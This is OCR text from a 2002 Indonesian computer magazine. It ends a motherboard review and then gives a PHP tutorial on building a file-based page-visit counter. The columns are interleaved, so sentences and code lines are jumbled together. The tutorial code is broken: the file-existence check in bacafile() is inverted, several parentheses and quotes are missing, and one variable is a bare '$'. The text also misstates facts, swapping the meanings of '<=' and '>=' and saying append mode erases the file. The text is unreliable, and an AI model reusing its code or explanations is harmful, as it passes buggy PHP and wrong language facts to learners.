kung output digital dan sedikitnya berbentuk 5.1 speakers. Onboard Audio VIA VT1616 6 Channel AC'97
Codec
Untuk koneksi jaringan, P4PB 400 menggunakan
Onboard IEEE1394 VIA VT6306 IEEE 1394 (optional)
kinerja dari VIA VT6105M 10/100
Mbps Ethernet Lan Onboard I/O 2 USB 2.0/1.1 Connectors for 4
Additional ports
2 IEEE 1394 ports (optional)
1 Audio pin header for SPDIF, Read,
Sub/Center
CD Audio-in in Connector
AUX-in Connector
Voice Modem Connector
IR Connector
Wake-on-LAN, Wake-on-RING
CPU/Power/Sys Fan
20-pin ATX Power, 4-pin ATX AUX
12V power
1x Buzzer
1 Dip Switch for 100/133/Auto FSB
Setting
Chip yang onboard System Intrusion Connector
pada motherboard ini. Chip Lan ini Smart Card Reader Connector
merupakan produk terbaru dan unggulan dari
Back Panel I/O 1 PS2 Mouse Port
VIA yang memudahkan kita mengatur suatu jaringan dengan 1 PS2 Keyboard Port
fitur Wake-on-LAN, remote bootability dan multiple VLAN. 1 RJ 45 100/10Mb LAN Port
Motherboard ini menggunakan ukuran ATX 4 layers (30.5 2 USB 2.0/1.1 Ports
cm x 22.5 cm) dengan tiga slot DDR333, 5 slot untuk PCI, 1 2 Serial Ports
slot AGP 8x dan 1 slot CNR. Dokumen pembantu yang 1 Parallel Port
3 Audio Jacks
diberikan cukup lengkap berupa 1 user's manual dan 1 Quick 1 Game/Midi Port
Installation. CD bundle yang diberikan berisikan driver untuk
motherboard dan sebuah aplikasi bernama Flite Deck yang BIOS Award BIOS, STR, ACPI, Wfm 2.0.
dapat memudahkan user dalam over clocking, system DMI 2.0
monitoring dan BIOS Updates juga disertai dengan 4 utilitas 2/4Mbit Flash Memory
yaitu Mission Control, Jet Stream, Flash Point dan Sys Probe.
Overclocking 100Mhz up to 200Mhz adjustment
Kelemahan dari motherboard ini terletak pada tidak adanya by 1Mhz increments
slot ISA dan socket untuk SDRAM yang mungkin masih Tunebale Vcore/Vdimm/Vagp
perlu dipakai. Tapi ini didukung pula dengan kelebihan seperti BIOS Overclocking Auto Recovery
motherboard ini khusus untuk para overclocker pemula yang
ingin mencoba namun takut rusak motherboardnya, kali ini Distributor PT ATIKOM Mega Pratama
ada BIOS Over clocking Auto Recovery. 021-6123612
www.atikom.co.id

Harga $ 102

38 NeoTek November 2002


NeoTutor

P H P Praktis dalam Aplikasi


Aplikasi Counter
Pada bagian ini, NeoTek mengajak anda mempelajari PHP dalam praktik dengan membuat aplikasi
counter untuk situs Web anda untuk mengetahui jumlah kunjungan ke situs tersebut.

ALI INI KITA AKAN MENCOBA MEMBUAT SUATU aplikasi • “<<<”—String dengan menggunakan here doc syntax .
K yang sering sekali digunakan oleh para pemilik situs,
yaitu page counter alias penghitung banyaknya pe-
Perhatikan contoh berikut:

ngunjung ke halam situs kita. Memang di Internet telah ba- <?php


nyak tersedia konter gratisan yang siap pakai. Tapi tentunya $str = <<<EOD
situs anda akan jauh lebih tampak profesional jika anda Example of string spanning multiple lines using heredoc syntax.
EOD;
memasang page counter buatan sendiri.
Pada aplikasi kali ini kita belum menggunakan DBMS—seperti /* More complex example, with variables. */
MySQL—meskipun demikian kita akan mulai menggunakan class foo
{
basisdata dalam bentuk file biasa, sehingga pada tulisan kali ini var $foo;
kita akan mulai mempelajari fungsi-fungsi manipulasi file. var $bar;
PHP Mengenal 8 macam tipe data yaitu: boolean, array,
function foo()
integer, object, floating point, resource, string, dan null. Pada {
artikel ini dibahas dua tipe data: String dan Array. $this->foo = 'Foo';
$this->bar = array('Bar1', 'Bar2', 'Bar3');
Tipe Data String }
Suatu string dapat didefinisikan dengan 3 cara: }

• ‘String’—String dengan menggunakan tanda petik tunggal. $foo = new foo();


Perhatikan contoh pemakaian sebagai berikut : $name = 'MyName';

echo 'contoh string sederhana'; echo <<<EOT


echo 'Anda dapat menuliskan string lebih dari satu baris, seperti ini'; My name is "$name". I am printing some $foo->foo.
echo 'Saya berkata: "I\'ll be back"'; Now, I am printing some {$foo->bar[1]}.
This should print a capital 'A': \x41
// output: ... "I'll be back" EOT;
echo 'Are you sure you want to delete C:\\*.*?'; ?>
// output: ... delete C:\*.*?
echo 'Are you sure you want to delete C:\*.*?';
// output: ... delete C:\*.*? Operasi pemecahan terhadap string:
echo '\n a newline'; Pada aplikasi kali ini kita akan menggunakan fungsi explode()
// output: \n a newline untuk memecah string menjadi array assosiatif. Fungsi
explode() mempunyai dua komponen utama yaitu format,
Dari contoh di atas dapat disimpulkan bahwa setiap nama maksudnya adalah karakter atau string yang digunakan seba-
variabel dan escaped character seperti (\n) tidak akan gai pemisah, dan string yang akan di proses itu sendiri.
dieksekusi pada penggunaan tanda petik tunggal. Perhatikan contoh berikut ini:
• “String”—String dengan menggunakan tanda petik ganda.
<?php
Jika menggunakan tanda petik ganda maka PHP akan meng-
eksekusi nama-nama variabel serta escaped character. $str1="Majalah Neotek";
Perhatikan tabel escaped character berikut ini: $str2=explode(" ",$str1);
?>
Sequence Meaning
\n Ganti baris Pada contoh di atas variabel $str2 akan merupakan suatu array
\r Carriage assosiatif dengan dua elemen yaitu elemen ke-0 "Majalah",
\t Tab horizontal dan elemen ke-1 "Neotek".
\\ Backslash Menggabungkan beberapa varabel dalam satu string:
\$ Tanda dolar Paling mudah dengan menggunakan tanda petik ganda. Seperti
\" Tanda kutip yang telah kita jelaskan di atas.
\[0-7]{1,3} Urutan karakter yang sesuai dengan ekspresi reguler
adalah karakter yang berada dalam notasi oktal Tipe Data Array
\x[0-9A-Fa-f Urutan karakter yang sesuai dengan ekspresi reguler Array atau larik, yaitu suatu data yang berisi lebih dari satu
{1,2} adalah karakter yang berada dalam notasi heksa elemen atau nilai serta dapat diindeks baik dengan penomoran
maupun dengan penamaan. Array seperti ini disebut sebagai

November 2002 NeoTek 39


NeoTutor

array assosiatif. Dalam PHP array tidak harus satu tipe, namun Operator Perbandingan
boleh berbeda-beda tipe. Operator yang digunakan untuk membandingkan dua
Pendefinisian Array ekspresi. Perhatikan tabel berikut:
Array dapat kita definisikan langsung dengan menyebutkan Contoh Nama Hasil
anggota-anggotanya. Contohnya adalah sebagai berikut: $a == $b Sama dengan TRUE jika $a sama dengan $b.
<?php $a === $b Identik TRUE jika $a sama dan setipe dengan $b(PHP4)
$a != $b Tidak sama dengan TRUE jika $a tidak sama dengan $b.
$larik[]=1;$larik[]=2;$larik[]=3;$larik[]=4;
$a <> $b Tidak sama dengan TRUE jika $a tidak sama dengan $b.
?>
$a !== $b Tidak Identik TRUE jika $a tidak sama & tidak setipe dengan $b(PHP4)
$a < $b Lebih kecil TRUE jika $a lebih kecil dari $b.
Jika kita panggil $larik[0], maka yang akan ditampilkan $a > $b Lebih besar TRUE jika $a lebih besar dari $b.
adalah 1, jika kita panggil $larik[1] yang akan ditampilkan $a <= $b Lebih kecil sama dengan TRUE jika $a lebih besar sama dengan $b.
adalah 2 dan demikian seterusnya. $a >= $b Lebih besar sama dengan TRUE jika $a lebih kecil sama dengan $b.
Array dapat juga didefinisikan dengan menggunakan
fungsi array(). Berikut adalah contohnya: Selain operator-operator kondisional di atas, terdapat juga
operator kondisional “?:” Perhatikan contoh berikut:
<?php
(kondisi) ? (ekspresi 1) : (ekspresi 2);
$larik=array(1,2,3,4);
?> Operator ini akan memberikan nilai pada ekspresi satu jika
kondisi terpenuhi dan sebaliknya jika kondisi tidak dipenuhi
Contoh di atas menghasilkan nilai yang sama dengan contoh maka yang akan digunakan adalah ekspresi yang kedua.
sebelumnya.
Operator Increment/Decrement
Operator Yaitu operator yang digunakan untuk menambah atau
Operator Aritmatika mengurangi satu angka. Perhatikan tabel berikut:
Yaitu operator yang digunakan untuk melakukan operasi Contoh Nama Hasil
matematika dasar. Perhatikan daftar pada tabel berikut :
++$a Pre-increment Menaikkan nilai $a, mengembalikan nilai $a.
Contoh Nama Hasil $a++ Post-increment Mengembalikan nilai $a, menaikkan nilai $a
$a + $b Penjumlahan Jumlah $a dan $b. --$a Pre-decrement Menurunkan nilai $a, mengembalikan nilai $a.
$a - $b Pengurangan Selisih $a dan $b. $a-- Post-decrement Mengembalikan nilai $a, menurunkan nilai $a
$a * $b Perkalian Hasil kali $a dan $b.
$a / $b Pembagian Hasil bagi $a oleh $b. Untuk lebih jelasnya, lihat contoh berikut:
$a % $b Sisa bagi Sisa bagi $a oleh $b.
<?php
echo "<h3&gt;Postincrement</h3&gt;";
Operator Assignment $a = 5;
Operator dasar assignment adalah ‘=’, yang memiliki arti bah- echo "Should be 5: " . $a++ . "<br>\n";
wa ekspresi sebelah kanan akan diisi dengan ekspresi di sebelah echo "Should be 6: " . $a . "<br>\n";
kiri operator. Selain operator dasar tersebut, operator assigment
juga terdiri dari gabungan antara operasi dasar dengan echo "<h3>Preincrement</h3>";
operator aritmatika. Perhatikan tabel berikut :
$a = 5;
Contoh Hasil echo "Should be 6: " . ++$a . "<br>\n";
echo "Should be 6: " . $a . "<br>\n";
$a += $b $a = $a + $b
$a -= $b $a = $a - $b
echo "<h3>Postdecrement</h3>";
$a *= $b $a = $a * $b
$a = 5;
$a /= $b $a = $a / $b
echo "Should be 5: " . $a-- . "<br>\n";
$a %= $b $a = $a % $b
echo "Should be 4: " . $a . "<br>\n";
Operator Bitwise
echo "<h3>Predecrement</h3>";
Operator yang digunakan untuk operasi dalam bit. Perhatikan
$a = 5;
tabel berikut:
echo "Should be 4: " . --$a . "<br>\n";
Contoh Deskripsi echo "Should be 4: " . $a . "<br>\n";
?>
$a & $b Operasi And
$a | $b Operasi Or
$a ^ $b Operasi Xor Operator Logika
~ $a Operasi Not Yaitu operator yang digunakan untuk menggabungkan nilai
$a << $b Geser kiri kebenaran dua ekspresi. Perhatikan tabel contoh pada halaman
$a >> $b Geser kanan berikut:

40 NeoTek November 2002


NeoTutor

Contoh Nama Hasil Percabangan dengan statement If dan If…else


$a and $b Operasi And TRUE jika $a dan $b TRUE. Pada pembahasan sebelumnya kita telah membicarakan
$a or $b Operasi Or TRUE jika salah satu $a atau $b TRUE. percabangan dengan switch. Kali ini kita akan membicarakan
$a xor $b Operasi Xor TRUE jika salah satu saja $a atau $b TRUE percabangan dengan dua statement lain yaitu statement If
! $a Operasi Not TRUE jika $a FALSE. serta statement If…else.
$a && $b Operasi And TRUE jika $a dan $b TRUE.
$a || $b Operasi Or TRUE jika salah satu $a atau $b TRUE. Statement If
Digunakan untuk menentukan apakah sekelompok statement
Operator Precedence akan dieksekusi atau tidak, bergantung pada kondisi yang di-
Dalam suatu ekspresi sangat dimungkinkan adanya pengguna- asumsikan. Jika kondisi terpenuhi maka kelompok statement
an operator-operator secara bersamaan. Pengerjaan operasi akan dieksekusi. Namun jika tidak maka akan dilewati begitu
akan didasarkan pada prioritas. Sebagai contoh perhatikan saja. Berikut adalah sintaksnya:
operasi berikut:
If(Kondisi){
$a = 2 + 8 / 4; kelompok statement ;
}
Pada ekspresi di atas nilai dari variabel $a adalah 4, karena ope-
rasi pembagian terhadap bilangan akan dilaksanakan terlebih
dahulu, baru setelah itu hasilnya akan ditambahkan ke 2. Statement If…else
Penggunaan tanda dalam kurung "()", dapat dijadikan solusi Digunakan untuk menentukan mana yang akan dieksekusi
yaitu untuk mengelompokkan operasi-operasi yang harus dari dua kelompok statement tergantung dengan kondisi yang
dikerjakan terlebih dahulu. Sebagi contoh perhatikan operasi diasumsikan. Jika kondisi terpenuhi kelompok statement
berikut : pertama yang akan dieksekusi, jika kondisi tidak terpenuhi
makan kelompok statement kedua yang akan dieksekusi.
$a = (2 + 8) / 4 Berikut adalah sintaksnya :
Pada ekspresi kali ini nilai dari variabel $a adalah 2.5, karena If(kondisi){
operasi penjumlahan akan dilakukan terlebih dahulu. Kelompok statement pertama;
Untuk lengkapnya perhatikan tabel berikut: } else {
Associativity Operators Kelompok statement kedua;
}
left ,
left Or
left Xor Fungsi
left dan Selain fungsi-fungsi built-in yang telah disediakan oleh PHP,
right print kita juga dapat mendefinisikan sendiri fungsi-fungsi baru
sesuai dengan kebutuhan. Pendefinisian fungsi-fungsi ini dapat
left = += -= *= /= .= %= &= |= ^= ~= <<= >>=
mempersingkat alur aplikasi program utama, karena mendefi-
left ?:
nisikan dalam fungsi berarti membagi-bagi program menjadi
left || sub bagian yang lebih kecil.
left &&
Mendefinisikan suatu fungsi caranya yaitu dengan mengguna-
left |
kan statement function diikuti dengan nama fungsi yang akan
left ^ didefinisikan. Ingat, nama fungsi yang kita definiskan tidak
left & boleh sama dengan nama fungsi yang telah ada pada fungsi-
non-associative == != === !== fungsi built-in PHP. Karena akan muncul pesan error jika kita
non-associative < <= > >= tetap memaksakan diri.
left << >> Berikut adalah sintaks umum pendefinisian suatu fungsi:
left +-.
left */% Function namafungsi(){
right ! ~ ++ -- (int) (double) (string) (array) (object) @ Sekelompok Statement;
right [ }
non-associative new

Dalam fungsi jika hasil operasi dalam fungsi ingin dikembali-


Operator String kan ke suatu nilai saja, maka dapat digunakan statement
Ada dua operator string yaitu “.” dan “.=”. Untuk pemakaian- return, yang diikuti oleh nilai atau variabel yang akan dijadi-
nya perhatikan contoh berikut: kan nilai kembalian.
Pemanggilan fungsi dari program utama yaitu dengan cara
$a = "Belajar ";
menyebutkan nama fungsi tersebut.
$b = $a . "PHP"; // $b = "Belajar PHP"
Fungsi-Fungsi Manipulasi File
$a = "Belajar "; Pada pembahasan kali ini yang akan kita bicarakan adalah
fungsi-fungsi yang berkenaan dengan manipulasi suatu file
$a.= "PHP" // $a = "Belajar PHP"
teks, yaitu:

November 2002 NeoTek 41


NeoTutor

Fungsi chmod() File Basisdata


Fungsi ini digunakan untuk mengubah mode suatu file. Mode File-file yang kita gunakan untuk menyimpan data jumlah
harus dalam oktal. Perhatikan contoh berikut: pengunjung situs. File basisdata yang kita gunakan ada dua
yaitu:
chmod ("/somedir/somefile", 755); // desimal; salah!
chmod ("/somedir/somefile", "u+rwx,go+rx"); // string; salah! • Total.db.php
chmod ("/somedir/somefile", 0755); // oktal; benar! File yang kita gunakan untuk menyimpan data total
pengunjung situs. Kita namakan file ini ini dengan nama
total.db.php. Buat dengan notepad source file total.db.php
Fungsi fopen() sebagai berikut :
Fungsi ini digunakan untuk membuka koneksi ke suatu file,
memiliki dua parameter formal yaitu fopen(namafile, mode). <?#1#?>
Namafile adalah nama file yang akan dibuka. Sedangkan mode
adalah: Keterangan:
Data angka yang merupakan bilangan yang menunjukkan
• ‘r’ - membuka file hanya untuk dibaca saja; pointer berada di jumlah total pengunjung situs kita apit dengan tag <? … ?>
awal file. yang merupakan tag pembuka dan penutup suatu file PHP
• ‘r+’ - membuka file untuk dibaca dan ditulisi; pointer berada dengan tujuan keamanan. Sehingga data yang ada tidak
di awal file. dapat diakses oleh pihak luar. Sedangkan antara tag pengapit
• ‘w’ - membuka file hanya untuk ditulisi saja, pointer berada dengan data kita pisahkan dengan menggunakam tanda
di awal file, dan jika sebelumnya file telah terisi maka isi file pagar (#). Ada keuntungan tersendiri jika kita menggunakan
akan terhapus, jika file belum ada maka akan dibuat file baru. tanda pagar di sini sebagai pemisah. Pertama, tanda pagar
• ‘w+’ - membuka file untuk ditulisi dan dibaca, pointer ber- merupakan salah satu cara untuk menandai komentar dalam
ada di awal file, dan jika sebelumnya file telah terisi maka isi skrip PHP, sehingga nantinya jika ada yang iseng mengakses
file akan terhapus, jika file belum ada maka akan dibuat file halaman ini yaitu total.db.php dari browser, maka yang akan
baru. didapatkannya hanyalah sebuah halaman kosong, karena
tidak ada pemrosesan terhadap komentar. Selain itu tanda
• ‘a’ - membuka file hanya untuk ditulisi saja, pointer berada pagar ini hanya satu karakter saja sehingga dapat menghemat
di akhir file, dan jika sebelumnya file telah terisi maka isi file ukuran file database kita nantinya.
akan terhapus, jika file belum ada maka akan dibuat file baru.
Mungkin anda bertanya mengapa musti ada pemisah antara
• ‘a+’ - membuka file hanya untuk ditulisi saja, pointer berada tag pengapit dengan data. Jawabnya sangat sederhana. Yaitu
di akhir file, dan jika sebelumnya file telah terisi maka isi file karena dengan adanya tag pemisah ini kita akan dengan sa-
akan terhapus, jika file belum ada maka akan dibuat file baru. ngat mudah dapat memanipulasi isi file yang nota bene
Perhatikan contoh berikut: adalah string biasa.
• harian.db.php
$fp = fopen ("/home/rasmus/file.txt", "r");
$fp = fopen ("/home/rasmus/file.gif", "wb");
File yang kita gunakan untuk menyimpan data harian
pengunjung situs. Kita namakan file ini dengan nama
$fp = fopen ("http://www.php.net/", "r");
harian.db.php. Buat dengan notepad source file
$fp = fopen ("ftp://user:password@example.com/", "w"); harian.db.php sebagai berikut:
<?#01052002#1#?>
Fungsi fread()
Digunakan untuk membaca isi file yang telah dibuka dengan Keterangan:
fungsi fopen(), sebelumnya. Perhatikan contoh berikut: Prinsipnya file harian.db.php ini sama saja dengan file
total.db.php. Tapi karena file ini bertugas untuk mencatat
// definisi lokal file data secara harian maka ada tambahan data yaitu tanggal
$filename = "/usr/local/something.txt"; dalam format "ddmmyyyy", sebagai identifikasi terhadap
$fd = fopen ($filename, "r"); hari yang sedang berlangsung nantinya. Dalam file ini kita
$contents = fread ($fd, filesize ($filename));
juga masih menempatkan data-data dalam tag pengapit <?
… ?> serta memakai tanda pagar (#) sebagai pemisah.
fclose ($fd);

File Pemroses
Fungsi fwrite() Merupakan source dari aplikasi itu sendiri, yang terdiri dari
Digunakan untuk menuliskan ke dalam file. Perhatikan fungsi-fungsi yang kita definisikan untuk melakukan tugas-
pembahasan aplikasi! tugas tertentu yaitu untuk membaca file serta menulis pada
file basisdata.
Fungsi fclose() File pemroses akan memuat dua fungsi utama yang akan kita
Digunakan untuk menutup koneksi file. Perhatikan gunakan untuk memanipulasi file-file basisdata. Kedua fungsi
pembahasan aplikasi! tersebut adalah:
Pembahasan Aplikasi • bacafile()
Sebelum membahas algoritma dari aplikasi konter, ada baiknya Fungsi yang kita gunakan untuk membaca isi file-file
jika kita lihat dahulu file-file apa saja yang akan kita gunakan database
dalam aplikasi ini. Kita dapat mengelompokkan file-file yang Fungsi ini kita namakan bacafile(), yang source-nya seperti
akan kita gunakan menjadi dua bagian yaitu: tertulis berikut ini:

42 NeoTek November 2002


NeoTutor

<?php akhirnya nilai yang terkandung dari variabel inilah yang kita
function bacafile($x){ kembalikan untuk nilai akhir dari fungsi bacafile() kita, de-
//cek dulu apakah file yang akan dibaca ada? ngan menggunakan statement return.
if(!file_exists($x){ Maka selesailah percabangan untuk kemungkinan yang per-
chmod($x,0644);//file yang akan dibaca diubah modenya supaya dapat tama. Masih ada satu kemungkinan lagi yaitu kemungkinan
//dibaca yang kedua jika file tidak ditemukan. Langkah yang kita
$bfile=fopen($x,"r");//koneksi terhadap file
lakukan adalah dengan membuat file baru dengan nilai awal.
Caranya dengan menggunakan fungsi fopen() dengan mode
$bcfile=fread($bfile,filesize($x));//proses membaca isi file
w, yaitu meletakkan pointer di awal file, untuk membuat
fclose($bfile);//menutup koneksi terhadap file sebuah file teks baru dengan nama file yang akan kita baca,
return $bcfile;// mengembalikan nilai fungsi kepada nilai variabel apakah itu total.db.php ataukah harian.db.php. Selanjutnya
//$bcfile kita kembali dihadapkan pada pilihan isi dari file baru yang
} else { akan kita buat, karena seperti yang telah kita kemukakan di
$bfile=fopen($,"w");//membuat file baru atas isi antara file total.db.php dengan file harian.db.php
if($x=="total.db.php){ adalah tidak sama polanya.
$strfile="<?#1#?>//string yang dituliskan pada file total.db.php Dengan demikian percabangan dengan if…else kembali men-
} else { jadi solusi. Pertama kita anggap file adalah total.db.php. Jika
$strfile="<?#01052002#1#?>//isi file harian.db.php kondisi ini benar maka kita menentukan suatu variabel baru,
}
yaitu variabel $strfile dengan nilai isi awal dari file total.db.php.
Sebaliknya jika ternyata kondisi salah maka kita akan meng-
$tfile=fwrite($bfile,$strfile,strlen($strfile);//proses penulisan
isikan kedalam variabel tersebut isi awal dari file harian.db.php.
fclose($bfile); Selesailah masalah pemilihan isi file ini. Selanjutnya proses
return $strfile;//jika file tidak ada maka fungsi dikembalikan ke penulisan file kita lakukan dengan fungsi fwrite(). Masalah
//string awal kembali muncul karena dengan fungsi ini kita harus menen-
} tukan panjang karakter yang akan dituliskan, sementara
} karakter yang akan kita tuliskan tidak dapat kita pastikan
?> karena harus melalui percabangan terlebih dahulu. Namun
masalah ini kemudain menjadi selesai karena kita dapat
Keterangan: menggunakan fungsi strlen() untuk menentukan panjang
string dalam suatu variabel.
Secara ringkas cara kerja dari fungsi baca file di atas adalah,
pertama file menerima sebuah variabel input berupa nama Setelah itu koneksi terhadap file kita tutup dengan fungsi
file yang akan dibaca isinya, yang kemudian dilakukan per- fclose(). Dan nilai dari fungsi kita kembalikan ke nilai varia-
tama kali adalah mengecek apakah file itu ada ataukan tidak. bel $strfile. Dengan demikian selesailah percabangan untuk
Langkah ini dimaksudkan untuk berjaga-jaga, barangkali kemungkinan yang kedua, yang sekaligus selesai pulalah
saja kita lupa mengupload file database, maka bisa dibuatkan fungsi kita yang pertama, bacafile().
file baru nantinya.
• tulisfile()
Selanjutnya dengan percabangan if…else kita membuat
percabangan. Kemungkinan pertama yaitu file telah ada, Fungsi yang kita gunakan untuk menulis isi file-file database
kemungkinan yang kedua file tidak ada. Untuk kemungkin- Fungsi ini kita namakan sebagai fungsi tulisfile(), berikut
an yang pertama mula-mula kita harus meyakinkan dulu adalah source code-nya :
apakah file tersebut bisa terbaca atau tidak yaitu dengan
mengubah modenya menjadi 0644, sehingga yakinlah kita <?php
kalau kita punya wewenang penuh untuk membaca file function tulisfile($x,$y){
tersebut. Langkah ini kita lakukan dengan menggunakan //cek apakah string yang akan dituliskan ada nilainya?
fungsi chmod(). if($x!=""){
Proses pembacaan kita mulai dengan membuka koneksi //cek apakah file yang akan ditulisi ada?
terhadap file dengan fungsi fopen(), dengan dengan mode r, if(file_exists($y)){
artinya kita hanya akan membaca file tersebut saja dengan chmod($y,0644);//ubah mode file supaya dapat terbaca,
meletakkan pointer dari awal file. Setelah koneksi terjalin, //hanya jika file sudah ada
maka proses pembacaan file itu sendiri mulai kita lakukan }
dengan menggunakan fungsi fread(). Dengan fungsi fread() $bfile=fopen($y,"w");//koneksi ke file
ini, kita harus menentukan seberapa banyak karakter yang
fwrite($bfile,$x,strlen($x));//proses menulis
harus kita baca, tentunya kita tidak bisa menetapkannya
dengan pasti karena sifat file database yang selalu berubah- fclose($bfile);//menutup koneksi
ubah isi datanya. Untunglah suatu file teks besar filenya }
dalam byte sangat identik dengan jumlah karakter yang }
tertulis dalam file tersebut, sehingga kita bisa menetapkan ?>
banyaknya karakter yang harus dibaca adalah sejumlah
sama dengan besar file tersebut dalam byte. Karena pada Keterangan:
dasarnya file basisdata kita ini adalah file teks biasa maka Secara ringkas kita dapat memahami source code di atas
kita dapat menetapkan cara ini. Fungsi yang bisa kita sebagai berikut. Pertama kita asumsikan bahwa nilai yang
gunakan untuk menetukan besarnya file yang akan dibaca akan kita tuliskan ke file tidak boleh merupakan string ko-
dalam byte adalah fungsi filesize(). Sehingga masalah ini song, sehingga dengan statement if kita akan membuat pi-
menjadi selesai. Hasil pembacaan kita simpan dalam sebuah lihan apakan proses penulisan akan dilaksanakan atau tidak.
variabel yang kita namakan sebagai variabel $hbaca. Lalu

November 2002 NeoTek 43


NeoTutor

Cukup kita lakukan dengan memberi kondisi bahwa nilai va- Keterangan:
riabel $x tidak kosong. Jika kondisi ini terpenuhi maka pro- Secara algoritma source code di atas dapat kita pahami sebagai
ses penulisan akan dilakukan oleh fungsi, namun jika kondisi berikut.
ini tidak terpenuhi, maka fungsi tidak akan melakukan proses
penulisan. Sekarang jika kondisi terpenuhi maka langkah Pada langkah pertama kita membaca kedua file database, baik
selanjutnya adalah kita menentukan pilihan kembali apakah yang total maupun yang harian. Proses pembacaan akan kita
kita perlu mengubah mode file ataukah tidak. lakukan dengan menggunakan fungsi bacafile() yang telah kita
definisikan sebelumnya.
Jika file sudah ada, ada baiknya untuk jaga-jaga kita ubah da-
hulu mode file sehingga kita yakin betul kita punya wewenang Hasil pembacaan terhadap dua file kita simpan dalam variabel-
penuh untuk menulis file tersebut. Namun jika file tersebut variabel, masing-masing yaitu variabel $baca1 untuk database
belum ada maka justru kita tidak boleh melakukan langkah total, dan variabel $baca2 untuk database harian. Selanjutnya
ini karena akan menyebabkan error dalam fungsi kita ini. hasil baca dari file harus kita pecah-pecah menjadi suatu array
assosiatif, sehingga kita bisa mengambil data yang ada di da-
Untuk itu kembali dengan statement If kita dapat menentu- lamnya. Langkah ini kita lakukan dengan fungsi explode(),
kan apakah langkah ini akan dilakukan ataukah dilewati dengan pemecah yaitu karakter tanda pagar (#). Hasilnya kita
begitu saja. Caranya yaitu dengan memberi kondisi bahwa simpan dalam masing-masing variabel $h1 dan $h2. Variabel
file tersebut telah ada. Jika kondisi ini benar maka langkah $h1 akan merupakan suatu array dengan tiga elemen yaitu
mengubah mode fiole akan dilakukan, namun jika kondisi elemen ke-0 berisi string “<?”, elemen ke-1 berisi data total
ini salah maka langkah ini akan dilewati begitu saja. Selan- pengunjung, dan elemen ke-2 akan berisi string “?>” Ingat
jutnya adalah kita membuat koneksi ke file, jika file itu telah dalam PHP indeks array selalu dimulai dari angka nol.
ada atau kita membuat suatu file baru jika file tersebut be-
lum ada yaitu dengan menggunakan fungsi fopen() dengan Nah, dari ketiga elemen tadi kita hanya membutuhkan elemen
mode w. Kemudian proses penulisan dilakukan dengan fung- pertama saja, maka nilai dari elemen yang berindeks satu ini
si fwrite() dengan keterangan analog dengan fungsi sebelum- kita simpan dalam satu variabel khusus yaitu $total_konter.
nya. Dan setelah proses penulisan selesai koneksi terhadap Sekarang variabel $total_konter telah berisi data banyaknya
file kita tutup dengan fungsi fclose(). Maka selesailah fungsi pengunjung total. Dengan menggunakan logika yang sama
kita yang kedua. variabel $h2 akan menjadi suatu array dengan 4 elemen, yaitu
elemen ke-0 yang berisi string “<?”, elemen ke-1 yang berisi
Setelah selesai mendefinisikan fungsi yang akan kita gunakan, data tanggal, elemen ke-2 yang berisi data banyaknya
maka sekarang kita tinggal membuat alur dari aplikasi konter pengunjung hari tersebut, dan elemen ke-3 yang berisi string
kita. Perhatikan source code-nya sebagai berikut: “?>” Dari keempat elemen tersebut yang kita ambil adalah
<?php
elemen ke-1 yang kemudian kita simpan dalam variabel
$f1="total.db.php";//file database yang pertama
$tanggal_konter, dan elemen ke-2 yang kemudian kita simpan
dalam variabel $harian_konter.
$f2="harian.db.php";//file databse yang kedua
$baca1=bacafile($f1);//proses baca file database pertama Selesai sampai di situ proses pembacaan terhadap file-file
$baca2=bacafile($f2); //proses baca file database kedua basisdata. Selanjutnya kita harus mengecek, apakah sesi telah
//memecah hasil baca1 menjadi array assosiatif ada atau tidak. Jika anda bertanya buat apa pengecekan sesi ini?
$h1=explode("#",$baca1); Pengecekan sesi ini sangat berguna bagi kita untuk menentu-
$total_konter=$h1[1];//data pengunjung total kan apakah nilai konter akan dinaikkan atau tidak. Jika sesi te-
//memecah hasil baca2 menjadi array assosiatif lah ada artinya pengunjung tidak pada kali yang pertama mem-
$h2=explode("#",$baca2); buka page situs kita, sehingga jika kita ingin menghitung jumlah
$harian_konter=$h2[2];//data pengunjung hari ini pengunjung secara unik, maka nilai konter tentu saja tidak
$tanggal_konter=$h2[1];//tanggal yang tertera dalam file harian
akan kita naikkan. Sebaliknya jika sesi belum ada maka pengun-
//pengecekan sesi_konter
jung dapat dikatakan sedang membuka halaman situs kita
session_start();
untuk pertama kalinya, maka jumlah konter perlu kita naikkan.
if(!session_is_registered(sesi_konter)){ Dihadapkan pada pilihan seperti ini, yaitu untuk memilih apa-
$sesi_konter="isi";//mengisi variabel sesi dengan suatu nilai kah suatu blok statement harus dieksekusi ataukah tidak maka
session_register("sesi_konter");//registrasi variabel sesi kita dapat menggunakan statement If untuk menyelesaikan
$total_konter++;//nilai konter total dinaikkan masalah ini. Caranya mudah saja yaitu dengan memberi kon-
$str_total="<?#$total_konter#?>";//isi file yang telah diupdate disi bahwa sesi belum terregistrasi atau sebutlah sesi belum
tulisfile($str_total,$f1);//proses update file total.db.php ada. Kita dapat melakukannya dengan menggunakan operator
$sekarang=date("dmY");//melihat tanggal sekarang not (!) pada fungsi file_exist(). Jika kondisi ini benar maka blok
//cek apakah tanggal sekarang sama dengan yang tertera di file? statement pemroses kenaikkan konter dan perubahan pada file
if($tanggal_konter==$sekarang){ database akan dilakukan, namun jika kondisi tidak terpenuhi
$harian_konter++;//konter harian dinaikkan
maka blok statement tersebut akan dilewati begitu saja dan
} else {
nilai-nilai variabel konter tetap sesuai hasil pembacaan
$harian_konter=1;//konter harian dikembalikan ke 1
terhadap file basisdata di awal tadi.
} Sekarang diasumsikan jika kondisi terpenihi, maka proses yang
$str_harian="<?#$sekarang#$harian_konter#?>";//isi file diupdate pertama kali kita lakukan adalah dengan membuat suatu varia-
tulisfile($str_harian,$f2);proses update bel baru yaitu $sesi_konter yang dapat kita isi secara semba-
} rang. Variabel ini kemudian akan kita registrasi sebagai varia-
//tampilkan variabel konter total dan variabel konter harian bel sesi. Registrasi terhadap variabel sesi ini kita lakukan de-
print("Anda adalah pengunjung ke-$harian_konter untuk hari ini, dari total ngan menggunakan fungsi session_register(). Setelah variabel
$total_konter pengunjung situs sampai dengan hari ini."); sesi kita registrasi, langkah selanjutnya adalah menaikkan nilai
?> variabel $total_konter. Penaikkan kita lakukan dengan meng-
gunakan operator Increment. Selanjutnya kita membuat suatu

44 NeoTek November 2002


NeoTutor

string yang berpola <?#$total_konter#?> untuk kita tuliskan Kemungkinan pertama, kondisi terpenuhi, artinya tanggal se-
dalam file database total.db.php. Setelah itu proses penulisan karang sama dengan yang tertera di file, maka langkah yang
